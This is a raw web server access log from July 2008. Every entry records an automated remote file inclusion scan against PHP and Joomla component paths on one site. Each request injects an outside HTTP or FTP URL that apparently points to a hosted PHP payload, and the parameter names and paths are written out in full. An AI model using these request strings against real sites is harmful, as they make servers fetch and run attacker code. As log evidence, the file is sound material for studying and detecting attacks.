70.85.102.132 - - [13/Jul/2008:12:05:30 -0700] "GET /logs/plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
217.114.163.198 - - [13/Jul/2008:12:05:30 -0700] "GET /index.php?option=com_extcalendarhttp://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 200 18461 "-" "libwww-perl/5.79" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:12:05:30 -0700] "GET /index.php?p=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 200 18415 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
217.114.163.198 - - [13/Jul/2008:12:05:31 -0700] "GET /logs/index.php?option=com_extcalendarhttp://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.146.134.209 - - [13/Jul/2008:12:05:37 -0700] "GET /logs/access_080225.log/index2.php?x=http://steam2k8.st.funpic.de/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.146.134.209 - - [13/Jul/2008:12:05:37 -0700] "GET /index2.php?x=http://steam2k8.st.funpic.de/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.230.204.130 - - [13/Jul/2008:12:05:38 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.230.204.130 - - [13/Jul/2008:12:05:39 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.230.204.130 - - [13/Jul/2008:12:05:39 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.146.134.209 - - [13/Jul/2008:12:05:44 -0700] "GET /logs/index2.php?x=http://steam2k8.st.funpic.de/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [13/Jul/2008:12:05:47 -0700] "GET /errors.php?error=http://doscoder.t35.com/ya.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:12:06:04 -0700] "GET /logs/access_080214.log/index.php?canal=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:12:06:09 -0700] "GET /index.php?canal=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 200 18405 "-" "libwww-perl/5.805" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:12:06:17 -0700] "GET /logs/index.php?canal=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:12:06:21 -0700] "GET /logs/access_080303.log/index.php?canal=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.26 - - [13/Jul/2008:12:06:21 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://fwt.txdnl.com/6-30/c/e/ceasca/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
67.19.107.26 - - [13/Jul/2008:12:06:21 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://fwt.txdnl.com/6-30/c/e/ceasca/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:12:06:46 -0700] "GET /logs/access_080313.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=injexhttp://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:12:06:46 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=injexhttp://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:12:06:47 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=injexhttp://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.85.102.132 - - [13/Jul/2008:12:07:11 -0700] "GET /protection.php?action=logout&siteurl=injexhttp://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
81.26.15.73 - - [13/Jul/2008:12:07:26 -0700] "GET /logs/index.php?option=com_joomla-visiteshttp://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.15.73 - - [13/Jul/2008:12:07:29 -0700] "GET /index.php?option=com_joomla-visiteshttp://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 200 18467 "-" "libwww-perl/5.79" "www.dmulk.com"
87.146.134.209 - - [13/Jul/2008:12:08:07 -0700] "GET /logs/access_080105.log/index.php?configFile=http://steam2k8.st.funpic.de/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.146.134.209 - - [13/Jul/2008:12:08:07 -0700] "GET /logs/index.php?configFile=http://steam2k8.st.funpic.de/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.146.134.209 - - [13/Jul/2008:12:08:11 -0700] "GET /index.php?configFile=http://steam2k8.st.funpic.de/help01.txt??? HTTP/1.1" 200 18419 "-" "libwww-perl/5.805" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:12:08:13 -0700] "GET /logs/access_080315.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:12:08:14 -0700] "GET /logs/access_080315.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:12:08:14 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:12:08:14 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:12:08:27 -0700] "GET /logs/access.log/index.php?sayfa=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:12:08:29 -0700] "GET /logs/access_080225.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:12:08:29 -0700] "GET /logs/access_080225.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.19.6.245 - - [13/Jul/2008:12:08:36 -0700] "GET /logs/access_080329.log/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.19.6.245 - - [13/Jul/2008:12:08:38 -0700] "GET /components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.19.6.245 - - [13/Jul/2008:12:08:39 -0700] "GET /logs/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.64.177.199 - - [13/Jul/2008:12:08:39 -0700] "GET /logs/access.log/index.php?option=com_galleriahttp://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.64.177.199 - - [13/Jul/2008:12:08:44 -0700] "GET /index.php?option=com_galleriahttp://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 200 18455 "-" "libwww-perl/5.805" "www.dmulk.com"
217.64.177.199 - - [13/Jul/2008:12:08:45 -0700] "GET /logs/index.php?option=com_galleriahttp://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:12:08:58 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=injexhttp://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
85.92.144.58 - - [13/Jul/2008:12:08:58 -0700] "GET /logs/index2.php?x=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.92.144.58 - - [13/Jul/2008:12:08:59 -0700] "GET /logs/index2.php?x=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.92.144.58 - - [13/Jul/2008:12:08:59 -0700] "GET /index2.php?x=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.92.144.58 - - [13/Jul/2008:12:08:59 -0700] "GET /index2.php?x=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [13/Jul/2008:12:09:03 -0700] "GET /logs/access.log/errors.php?error=http://doscoder.t35.com/ya.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [13/Jul/2008:12:09:03 -0700] "GET /errors.php?error=http://doscoder.t35.com/ya.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [13/Jul/2008:12:09:03 -0700] "GET /logs/errors.php?error=http://doscoder.t35.com/ya.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.146.134.209 - - [13/Jul/2008:12:09:04 -0700] "GET /logs/access.log/index.php?include=http://steam2k8.st.funpic.de/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.146.134.209 - - [13/Jul/2008:12:09:07 -0700] "GET /logs/index.php?include=http://steam2k8.st.funpic.de/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.146.134.209 - - [13/Jul/2008:12:09:08 -0700] "GET /index.php?include=http://steam2k8.st.funpic.de/help01.txt??? HTTP/1.1" 200 18413 "-" "libwww-perl/5.805" "www.dmulk.com"
66.230.204.130 - - [13/Jul/2008:12:09:11 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:12:09:13 -0700] "GET /logs//errors.php?error=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:12:09:13 -0700] "GET //errors.php?error=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.230.204.130 - - [13/Jul/2008:12:09:47 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.230.204.130 - - [13/Jul/2008:12:09:48 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.230.204.130 - - [13/Jul/2008:12:09:48 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
200.29.4.54 - - [13/Jul/2008:12:10:00 -0700] "GET /logs/index.php?pag=http://gang11.co.cc/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.230.204.130 - - [13/Jul/2008:12:10:02 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
200.29.4.54 - - [13/Jul/2008:12:10:12 -0700] "GET /index.php?pag=http://gang11.co.cc/file/id.txt??? HTTP/1.1" 200 18393 "-" "libwww-perl/5.79" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:12:10:14 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=injexhttp://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:12:10:14 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=injexhttp://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.151.102.50 - - [13/Jul/2008:12:10:15 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.102.50 - - [13/Jul/2008:12:10:15 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.64.177.199 - - [13/Jul/2008:12:10:18 -0700] "GET /logs/access_080315.log/index.php?option=com_galleriahttp://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.165.180.214 - - [13/Jul/2008:12:10:23 -0700] "GET /logs/access_080118.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.165.180.214 - - [13/Jul/2008:12:10:23 -0700] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.165.180.214 - - [13/Jul/2008:12:10:23 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.151.102.50 - - [13/Jul/2008:12:10:44 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.102.50 - - [13/Jul/2008:12:10:45 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:12:11:01 -0700] "GET /logs/index.php?canal=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:12:11:05 -0700] "GET /index.php?canal=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 200 18411 "-" "libwww-perl/5.805" "www.dmulk.com"
195.85.130.159 - - [13/Jul/2008:12:11:08 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.85.130.159 - - [13/Jul/2008:12:11:09 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:11:45 -0700] "GET /logs/access_080329.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:11:49 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 200 18503 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:11:49 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.70.18 - - [13/Jul/2008:12:12:23 -0700] "GET /logs/access_080128.log/index.php?inc_dir=http://www.hotelberberys.pl/includes/domit/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.70.18 - - [13/Jul/2008:12:12:45 -0700] "GET /logs/access_080112.log/index.php?inc_dir=http://www.hotelberberys.pl/includes/domit/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:12:46 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 200 18503 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [13/Jul/2008:12:12:55 -0700] "GET /logs/?REX[INCLUDE_PATH]=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 200 55993 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
210.245.87.117 - - [13/Jul/2008:12:12:56 -0700] "GET /?REX[INCLUDE_PATH]=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 200 18423 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
88.214.192.29 - - [13/Jul/2008:12:12:56 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.75.225.10 - - [13/Jul/2008:12:12:56 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://keycell.webs.com/IDscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
88.214.192.29 - - [13/Jul/2008:12:12:56 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.75.225.10 - - [13/Jul/2008:12:12:56 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://keycell.webs.com/IDscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
88.214.192.29 - - [13/Jul/2008:12:12:56 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:12:13:34 -0700] "GET /logs/access_080207.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=injexhttp://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.19.6.245 - - [13/Jul/2008:12:13:54 -0700] "GET /logs/access_080329.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.19.6.245 - - [13/Jul/2008:12:13:55 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.19.6.245 - - [13/Jul/2008:12:13:55 -0700] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:12:14:30 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:12:14:30 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.29.77.32 - - [13/Jul/2008:12:14:36 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.114.163.198 - - [13/Jul/2008:12:14:38 -0700] "GET /logs/access_080207.log/index.php?option=com_extcalendarhttp://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.29.77.32 - - [13/Jul/2008:12:14:39 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 200 18585 "-" "libwww-perl/5.76" "www.dmulk.com"
213.223.138.100 - - [13/Jul/2008:12:14:48 -0700] "GET /logs/access_071224.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.117.89.191 - - [13/Jul/2008:12:14:50 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.117.89.191 - - [13/Jul/2008:12:14:51 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:12:14:59 -0700] "GET /logs/index2.php?x=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:12:14:59 -0700] "GET /index2.php?x=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.122.3 - - [13/Jul/2008:12:15:02 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.122.3 - - [13/Jul/2008:12:15:03 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:15:09 -0700] "GET /logs/access_080315.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:15:18 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:15:22 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 200 18513 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:15:22 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.207.108.27 - - [13/Jul/2008:12:15:23 -0700] "GET /logs/access_080507.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.214.192.29 - - [13/Jul/2008:12:15:26 -0700] "GET /logs/access_080110.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:12:15:52 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:12:15:52 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:15:59 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 200 18517 "-" "libwww-perl/5.805" "www.dmulk.com"
89.248.101.56 - - [13/Jul/2008:12:16:05 -0700] "GET /logs/access_071224.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:16:06 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 200 18513 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.29.178 - - [13/Jul/2008:12:16:35 -0700] "GET /logs/access_071225.log/administrator/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [13/Jul/2008:12:16:35 -0700] "GET /administrator/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:12:16:35 -0700] "GET /logs/access_080313.log/?sourcedir=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:12:16:38 -0700] "GET /?sourcedir=http://artyficio.com/new/it.txt? HTTP/1.1" 200 18375 "-" "libwww-perl/5.812" "www.dmulk.com"
